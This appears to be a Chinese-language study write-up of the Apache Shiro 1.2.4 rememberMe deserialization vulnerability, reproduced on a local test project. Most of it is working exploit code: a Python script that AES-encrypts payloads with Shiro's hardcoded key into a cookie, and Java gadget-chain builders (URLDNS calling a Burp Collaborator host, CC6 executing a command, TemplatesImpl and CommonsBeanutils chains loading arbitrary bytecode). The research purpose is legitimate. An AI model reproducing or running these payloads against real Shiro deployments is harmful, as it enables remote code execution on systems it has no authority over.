dnslog
下载https://github.com/apache/shiro/releases/tag/shiro-root-1.2.4
打开web项目,改一下pom.xml
data:image/s3,"s3://crabby-images/b76d8/b76d8ed6a15ba4af8141498fa452df2d1cbfe648" alt="image-20220605155447136"
添加version
data:image/s3,"s3://crabby-images/88128/88128aca94a62e0c2941dec79dd213a66bbf011b" alt="image-20220605155539053"
data:image/s3,"s3://crabby-images/071bf/071bf9a99220a20ff1c20bb608ccdb5815f82e37" alt="image-20220605155605630"
data:image/s3,"s3://crabby-images/238f3/238f3229d5e71a3fe24ac232002010c9769ab220" alt="image-20220730195344391"
data:image/s3,"s3://crabby-images/41ca9/41ca9a7abe96f52d14cf651652e13b5ac2bb4fa0" alt="image-20220730195405211"
data:image/s3,"s3://crabby-images/dd5b6/dd5b6c9af0372a57eeb4fa48b040c33213512723" alt="image-20220605160749710"
data:image/s3,"s3://crabby-images/7b1ec/7b1ec7daa954b30678395efeed75d2821468cd03" alt="image-20220605160829014"
data:image/s3,"s3://crabby-images/568ab/568ab6a2a350909566499fe79f79e133220616cf" alt="image-20220605160846417"
这里返回了一个极大的cookie,根据经验来看,可能存储了用户的相关信息,推测可能是反序列化
两下shift 找到了这个
data:image/s3,"s3://crabby-images/0dda3/0dda338c97678efd415c180f173d24c92ce9d8d4" alt="image-20220605161101753"
我们先看到这个rememberSerializedIdentity()方法可以清楚的看到对数组进行了base64加密操作,接着将base64存入了cookie中
data:image/s3,"s3://crabby-images/36e30/36e30453d06ea145644e4ffb2744aa15de4a69eb" alt="image-20220730210502441"
这里的getRememberedSerializedIdentity()方法也可以看出来先获取了cookie中的值
data:image/s3,"s3://crabby-images/57e39/57e39f9b1b366ad26b963b58c90c895aed818390" alt="image-20220730210722200"
data:image/s3,"s3://crabby-images/066bc/066bc113d471ad65ed1ce9f1d4d868073b7060e0" alt="image-20220730210817612"
返回了一个decoded数组,我们接着去看看谁调用的这个解码函数 也可以看到AbstractRememberMeManager类的getRememberedPrincipals()方法调用的
data:image/s3,"s3://crabby-images/9d102/9d10266c64c54d23e82dad5c1c3807002d687897" alt="image-20220730211249858"
data:image/s3,"s3://crabby-images/b595d/b595d183337a593ad73443cfc086689e0d510b89" alt="image-20220730211915192"
这里又接着去调用了decrpt()方法去解密
data:image/s3,"s3://crabby-images/0ef18/0ef1851fefea2598c27265785ceda2fca3d7d8e2" alt="image-20220730211936678"
这里去get了密钥
data:image/s3,"s3://crabby-images/51940/51940b863ccc0a69a59f2b37de9f80ce4967e3b4" alt="image-20220730212059776"
我们去看看这个decryptionCipherKey是如何赋值的
data:image/s3,"s3://crabby-images/4c86e/4c86e8a8d6d5aaf3b5695e54e7be2bb8c2d35f1d" alt="image-20220730212123744"
这里我们也是主要去看set值的地方
data:image/s3,"s3://crabby-images/95200/952002645442450dfef0ca457e308beb091cc28e" alt="image-20220730212216810"
接着找
data:image/s3,"s3://crabby-images/46ee7/46ee7773cbe657cc532fcd5e847ea372259d873f" alt="image-20220730212310899"
接着找
data:image/s3,"s3://crabby-images/ccd1c/ccd1c0885853a6bb0c0fc0c5efa3e41e9c8300e1" alt="image-20220730212501710"
可以看到这里的值是一个常量
data:image/s3,"s3://crabby-images/60e8a/60e8ab706cf8b1406bf16d1913974be860c06fbc" alt="image-20220730212541740"
这样我们就可以通过aes算法加base64来构造payload了
加个插件
data:image/s3,"s3://crabby-images/33fb5/33fb58461e274371b0e9b9cafc9e0e26af406e56" alt="image-20220605162519354"
这里发现cc只是在test阶段,也就是说cc链其实是没有被最后使用的,所以我们不能打cc链
data:image/s3,"s3://crabby-images/cc54d/cc54dff1f8b7f06cd92efbcdf6c1347b0877b33e" alt="image-20220605162616955"
先安包
pip install crypto pip install pycryptodome
|
写一下aes利用代码
import sys import base64 import uuid
from Crypto.Cipher import AES
def get_file_data(filename): with open(filename,"rb") as f: data = f.read() return data
def aes_enc(data): BS = AES.block_size pad = lambda s:s +((BS - len(s)% BS) * chr(BS-len(s) % BS)).encode() key = "kPH+bIxk5D2deZiIxcaaaA==" mode = AES.MODE_CBC iv = uuid.uuid4().bytes encryptor = AES.new(base64.b64decode(key),mode,iv) ciphertext = base64.b64encode(iv+encryptor.encrypt(pad(data))) return ciphertext
def aes_dec(enc_data): enc_data = base64.b64decode(enc_data) unpad = lambda s : s[:-s[-1]] key = "kPH+bIxk5D2deZiIxcaaaA==" mode = AES.MODE_CBC iv = enc_data[:16] encryptor = AES.new(base64.b64decode(key), mode, iv) plaintext = encryptor.decrypt(enc_data[16:]) plaintext = unpad(plaintext) return plaintext
if __name__ == '__main__': data = get_file_data("ser.bin") print(aes_enc(data))
|
如果还是不行的话就改一下文件名从小写crypto改成Crypto
data:image/s3,"s3://crabby-images/7ee2e/7ee2e9e4cb86b32ebf4d7e1bb26654de1753a859" alt="image-20220605165808046"
urldns的链
package org.example;
import java.io.FileInputStream; import java.io.FileOutputStream; import java.io.ObjectInputStream; import java.io.ObjectOutputStream; import java.lang.reflect.Field; import java.net.URL; import java.util.HashMap;
public class urldns { public static void main(String[] args) throws Exception {
HashMap<URL, Integer> objectObjectHashMap = new HashMap<>();
URL url = new URL("http://p9zs4jjd3p33527y055v96861x7nvc.burpcollaborator.net");
Class<? extends URL> urlClass = url.getClass();
Field hashCodeField = urlClass.getDeclaredField("hashCode"); hashCodeField.setAccessible(true); hashCodeField.set(url,111);
objectObjectHashMap.put(url,1);
hashCodeField.set(url,-1);
serilize(objectObjectHashMap);
} public static void serilize(Object obj)throws Exception{ ObjectOutputStream objectOutputStream = new ObjectOutputStream(new FileOutputStream("ser.bin")); objectOutputStream.writeObject(obj);
} public static Object unserilize(String Filename) throws Exception{ ObjectInputStream objectInputStream = new ObjectInputStream(new FileInputStream(Filename)); Object o = objectInputStream.readObject(); return o; }
}
|
data:image/s3,"s3://crabby-images/be803/be8032c9435c54a336521fa1ed34c8e8337e5ce0" alt="image-20220605170257048"
这里直接打的话还是root登录状态,但是其实我们已经换了key了,这说明这个jsessionid也在起作用
data:image/s3,"s3://crabby-images/8645d/8645d590ac287f86f167b9d3cb8ed901939083aa" alt="image-20220605170353248"
删去之后也是正常收到了dns请求
data:image/s3,"s3://crabby-images/f43fe/f43fe9aad472563955b1d8ded1e2fdf53f21c0e0" alt="image-20220605170400586"
看一下怎么反序列化的 在DefaultSerializer类的deserialize()
data:image/s3,"s3://crabby-images/68131/68131f9984acd842099cb1e28f783a4615283b4f" alt="image-20220605180831596"
接着我们知道这里的readObject之后就会调用到HashMap的readObject中,所以我们去HashMap下个断点
data:image/s3,"s3://crabby-images/25b85/25b85ed8c271a035003405206590a57ef4a25b99" alt="image-20220605181030372"
cc链
既然要打cc就需要加一个cc的依赖
data:image/s3,"s3://crabby-images/6c923/6c923832028ce33041b7c76beaf139d3e57c0688" alt="image-20220605184954264"
这里如果直接用cc6来试试看
package org.example;
import org.apache.commons.collections.Transformer; import org.apache.commons.collections.functors.ChainedTransformer; import org.apache.commons.collections.functors.ConstantTransformer; import org.apache.commons.collections.functors.InvokerTransformer; import org.apache.commons.collections.keyvalue.TiedMapEntry; import org.apache.commons.collections.map.LazyMap;
import java.io.*; import java.lang.reflect.Field; import java.util.HashMap; import java.util.Map;
public class CC6 { public static void main(String[] args) throws Exception { Transformer[] transformers = new Transformer[]{ new ConstantTransformer(Runtime.class), new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", null}), new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, null}), new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"}) }; ChainedTransformer chainedTransformer = new ChainedTransformer(transformers); HashMap<Object, Object> objectObjectHashMap = new HashMap<>();
Map lazyMap = LazyMap.decorate(objectObjectHashMap,new ConstantTransformer(1)); TiedMapEntry tiedMapEntry = new TiedMapEntry(lazyMap, "aaa"); HashMap<Object, Object> objectObjectHashMap1 = new HashMap<>(); objectObjectHashMap1.put(tiedMapEntry,"bbb");
lazyMap.remove("aaa");
Class<LazyMap> lazyMapClass = LazyMap.class;
Field factoryField = lazyMapClass.getDeclaredField("factory"); factoryField.setAccessible(true);
factoryField.set(lazyMap,chainedTransformer);
serialize(objectObjectHashMap1);
} public static void serialize(Object obj) throws IOException { ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("ser.bin")); oos.writeObject(obj); } public static Object unserialize(String Filename) throws IOException, ClassNotFoundException { ObjectInputStream objectInputStream = new ObjectInputStream(new FileInputStream(Filename)); Object obj = objectInputStream.readObject(); return obj; } }
|
可见这里出现了问题
data:image/s3,"s3://crabby-images/fe679/fe679a3d0defce55dd19d9db20b3aad3aab2b053" alt="image-20220605182301393"
从这里看用的不是原生的readObject我们跟过去看看
data:image/s3,"s3://crabby-images/6b5b4/6b5b40cfc2a270b1b684d02d006ccbdd341d1278" alt="image-20220605182409164"
这里可以看到重写了resolveClass,使用的是ClassUtils的forName,
data:image/s3,"s3://crabby-images/2dbe7/2dbe76339c42f59e06aa64c75248d30ef0219bad" alt="image-20220605182429123"
原生的是CLass
data:image/s3,"s3://crabby-images/dc5ba/dc5baa38362b6d4a92888854b909c2a46ffd146f" alt="image-20220605182712101"
可以看到这个注释
data:image/s3,"s3://crabby-images/5357f/5357faee4c3be9e5f2632a2c1ae198545a9078dc" alt="image-20220605182544932"
首先是加载一个HashMap
data:image/s3,"s3://crabby-images/52a8c/52a8c03b4141c02e4b41b246d14457c43d2ff294" alt="image-20220605192345491"
这里可以简单的理解为这个CLassUtil不能处理transform数组,而原生的可以处理,因此我们需要构造一条没有transform数组的链
package org.example;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; import org.apache.commons.collections.functors.ConstantTransformer; import org.apache.commons.collections.functors.InvokerTransformer; import org.apache.commons.collections.keyvalue.TiedMapEntry; import org.apache.commons.collections.map.LazyMap;
import java.io.*; import java.lang.reflect.Field; import java.nio.file.Files; import java.nio.file.Paths; import java.util.HashMap; import java.util.Map;
public class SCC { public static void main(String[] args) throws Exception {
TemplatesImpl templates = new TemplatesImpl(); Class<? extends TemplatesImpl> templatesClass = templates.getClass(); Field name = templatesClass.getDeclaredField("_name"); name.setAccessible(true); name.set(templates,"aaa"); Field bytecodes = templatesClass.getDeclaredField("_bytecodes"); bytecodes.setAccessible(true);
byte [] code = Files.readAllBytes(Paths.get("D:\\Download\\cc\\target\\classes\\org\\example\\Test.class")); byte [][] codes = {code}; bytecodes.set(templates,codes);
InvokerTransformer invokerTransformer = new InvokerTransformer("newTransformer", null, null);
HashMap<Object, Object> objectObjectHashMap = new HashMap<>();
Map lazyMap = LazyMap.decorate(objectObjectHashMap,new ConstantTransformer(1)); TiedMapEntry tiedMapEntry = new TiedMapEntry(lazyMap, templates); HashMap<Object, Object> objectObjectHashMap1 = new HashMap<>(); objectObjectHashMap1.put(tiedMapEntry,"bbb");
lazyMap.remove(templates);
Class<LazyMap> lazyMapClass = LazyMap.class;
Field factoryField = lazyMapClass.getDeclaredField("factory"); factoryField.setAccessible(true);
factoryField.set(lazyMap,invokerTransformer);
serialize(objectObjectHashMap1);
} public static void serialize(Object obj) throws IOException { ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("ser.bin")); oos.writeObject(obj); } public static Object unserialize(String Filename) throws IOException, ClassNotFoundException { ObjectInputStream objectInputStream = new ObjectInputStream(new FileInputStream(Filename)); Object obj = objectInputStream.readObject(); return obj; } }
|
data:image/s3,"s3://crabby-images/0704d/0704d5cb79a439f889be2c375601813b1fac660e" alt="image-20220605185126846"
无依赖
删除
data:image/s3,"s3://crabby-images/bf09c/bf09c57e07928a774b507c14ee69da597dce9229" alt="image-20220605193815546"
我们要打的就是左边lib的commons-benutils
在本地测试项添加依赖
data:image/s3,"s3://crabby-images/40534/4053444dd78c86a2c82939c464617909b5eed38c" alt="image-20220605194536849"
Persion.java
package org.example;
public class Persion { private String name; public int age;
public void action(){ System.out.println("action test"); } @Override public String toString() { return "Persion{" + "name='" + name + '\'' + ", age=" + age + '}'; }
public String getName() { return name; }
public void setName(String name) { this.name = name; }
public int getAge() { return age; }
public void setAge(int age) { this.age = age; }
public Persion() { }
public Persion(String name, int age) { this.name = name; this.age = age; } }
|
package org.example; import org.apache.commons.beanutils.PropertyUtils; public class BeanTest { public static void main(String[] args) throws Exception{ Persion persion = new Persion("aaa", 18); System.out.println(PropertyUtils.getProperty(persion,"name")); } }
|
data:image/s3,"s3://crabby-images/3f931/3f9319da72eace77c02606e38783f27b88baa000" alt="image-20220605194626331"
源码下不下来 官网下https://repo1.maven.org/maven2/commons-beanutils/commons-beanutils/1.8.3/
data:image/s3,"s3://crabby-images/15765/157650ac0fde0e1e671c686966f09b987c73707a" alt="image-20220605200939007"
data:image/s3,"s3://crabby-images/fda99/fda99c2736bba7394eb4c885a0993db0d7a8757d" alt="image-20220605201110506"
data:image/s3,"s3://crabby-images/056b2/056b2f98694e95df75f5aaf380644aa4761e7392" alt="image-20220605201124722"
data:image/s3,"s3://crabby-images/dc753/dc753d3c60ceecc1ed4db4e4ac40e42f85b1de89" alt="image-20220605201317980"
走到了这里
data:image/s3,"s3://crabby-images/bf536/bf5366465e4b82be643de024da262ead14f6f1fc" alt="image-20220605201552152"
可见这里走出来之后得到了这个
data:image/s3,"s3://crabby-images/be46d/be46d1b9fed3fad897bbdd7dc8b4a69935073599" alt="image-20220605201827468"
有个invoke方法
data:image/s3,"s3://crabby-images/59a40/59a406080f4946e579498e341177ba61d4bce049" alt="image-20220605201851825"
现在要去找谁调用考虑getProperty
data:image/s3,"s3://crabby-images/ed866/ed8660fe5f6f03fc4079661ee1ce0dfd8d936d5d" alt="image-20220605204004098"
找到了这个BeanComprator
package org.example; import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl; import org.apache.commons.beanutils.BeanComparator; import org.apache.commons.beanutils.PropertyUtils; import org.apache.commons.collections4.comparators.TransformingComparator; import org.apache.commons.collections4.functors.ConstantTransformer;
import java.io.*; import java.lang.reflect.Field; import java.nio.file.Files; import java.nio.file.Paths; import java.util.PriorityQueue;
public class BeanTest { public static void main(String[] args) throws Exception{ TemplatesImpl templates = new TemplatesImpl(); Class<? extends TemplatesImpl> templatesClass = templates.getClass(); Field name = templatesClass.getDeclaredField("_name"); name.setAccessible(true); name.set(templates,"aaa"); Field bytecodes = templatesClass.getDeclaredField("_bytecodes"); bytecodes.setAccessible(true);
Field tfactory = templatesClass.getDeclaredField("_tfactory"); tfactory.setAccessible(true); tfactory.set(templates,new TransformerFactoryImpl());
byte [] code = Files.readAllBytes(Paths.get("D:\\Download\\cc\\target\\classes\\org\\example\\Test.class")); byte [][] codes = {code}; bytecodes.set(templates,codes);
BeanComparator beanComparator = new BeanComparator("outputProperties");
TransformingComparator transformingComparator = new TransformingComparator(new ConstantTransformer(1));
PriorityQueue priorityQueue = new PriorityQueue<>(transformingComparator);
priorityQueue.add(templates); priorityQueue.add(2);
Class<PriorityQueue> priorityQueueClass = PriorityQueue.class; Field comparator = priorityQueueClass.getDeclaredField("comparator"); comparator.setAccessible(true); comparator.set(priorityQueue,beanComparator);
serialize(priorityQueue); unserialize("ser.bin");
} public static void serialize(Object obj) throws IOException { ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("ser.bin")); oos.writeObject(obj); } public static Object unserialize(String Filename) throws IOException, ClassNotFoundException { ObjectInputStream objectInputStream = new ObjectInputStream(new FileInputStream(Filename)); Object obj = objectInputStream.readObject(); return obj; } }
|
测试一下,可以先清理一下,在重启apache
data:image/s3,"s3://crabby-images/9d4a3/9d4a35798b3d7811d4139bc268e820948d86ceb4" alt="image-20220605205820671"
这里发现没有加载到这个ComparableComparator,原因是这个是cc的,我们需要改成不是cc的
data:image/s3,"s3://crabby-images/e55cf/e55cf3816008ad8f1dd09351fd9139bb9764a946" alt="image-20220605210220758"
可发现下面还有一个构造函数
data:image/s3,"s3://crabby-images/8a6fc/8a6fc27a6979118da65480c2313cf29909a735f0" alt="image-20220605210301237"
package org.example; import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl; import com.sun.org.apache.xml.internal.security.c14n.helper.AttrCompare; import org.apache.commons.beanutils.BeanComparator; import org.apache.commons.beanutils.PropertyUtils; import org.apache.commons.collections4.comparators.TransformingComparator; import org.apache.commons.collections4.functors.ConstantTransformer;
import java.io.*; import java.lang.reflect.Field; import java.nio.file.Files; import java.nio.file.Paths; import java.util.PriorityQueue;
public class BeanTest { public static void main(String[] args) throws Exception{ TemplatesImpl templates = new TemplatesImpl(); Class<? extends TemplatesImpl> templatesClass = templates.getClass(); Field name = templatesClass.getDeclaredField("_name"); name.setAccessible(true); name.set(templates,"aaa"); Field bytecodes = templatesClass.getDeclaredField("_bytecodes"); bytecodes.setAccessible(true);
Field tfactory = templatesClass.getDeclaredField("_tfactory"); tfactory.setAccessible(true); tfactory.set(templates,new TransformerFactoryImpl());
byte [] code = Files.readAllBytes(Paths.get("D:\\Download\\cc\\target\\classes\\org\\example\\Test.class")); byte [][] codes = {code}; bytecodes.set(templates,codes);
BeanComparator beanComparator = new BeanComparator("outputProperties",new AttrCompare());
TransformingComparator transformingComparator = new TransformingComparator(new ConstantTransformer(1));
PriorityQueue priorityQueue = new PriorityQueue<>(transformingComparator);
priorityQueue.add(templates); priorityQueue.add(2);
Class<PriorityQueue> priorityQueueClass = PriorityQueue.class; Field comparator = priorityQueueClass.getDeclaredField("comparator"); comparator.setAccessible(true); comparator.set(priorityQueue,beanComparator);
serialize(priorityQueue); unserialize("ser.bin");
} public static void serialize(Object obj) throws IOException { ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("ser.bin")); oos.writeObject(obj); } public static Object unserialize(String Filename) throws IOException, ClassNotFoundException { ObjectInputStream objectInputStream = new ObjectInputStream(new FileInputStream(Filename)); Object obj = objectInputStream.readObject(); return obj; } }
|
data:image/s3,"s3://crabby-images/758bb/758bb95c75014921a9d2d7d463c2ec43188de075" alt="image-20220605210347234"